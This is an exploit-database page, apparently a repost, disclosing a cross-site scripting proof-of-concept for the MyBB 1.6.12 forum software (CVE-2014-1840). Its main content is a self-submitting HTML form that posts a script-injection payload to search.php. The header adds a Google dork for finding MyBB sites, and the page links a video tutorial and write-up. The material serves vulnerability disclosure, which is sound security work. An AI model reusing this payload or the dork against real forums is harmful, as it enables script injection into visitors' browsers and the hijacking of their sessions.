facebook facebook twitter rss

MyBB 1.6.12 POST XSS 0day

Author: Osanda Malith Jayathissa , Published: 03-02-2014
<html>
<!--
Exploit-Title: MyBB 1.6.12 POST XSS 0day
Google-Dork: inurl:index.php intext:Powered By MyBB
Date: Februrary 2nd of 2014
Bug Discovered and Exploit Author: Osanda Malith Jayathissa
Vendor Homepage: http://www.mybb.com
Software Link: http://resources.mybb.com/downloads/mybb_1612.zip
Version: 1.6.12 (older versions might be vulnerbale)
Tested on: Windows 8 64-bit
Video: https://www.youtube.com/watch?v=67MfgixmWgo
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
CVE: CVE-2014-1840
-->
<body>
<form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST">
<input type="hidden" name="action" value="do_search" />
<input type="hidden" name="keywords"

value="qor'("\2a<script>alert(/XSS/)</script>

" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>

=====================================
Video Tut: https://www.youtube.com/watch?v=67MfgixmWgo
For more :
Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day
=====================================

Like us on Facebook :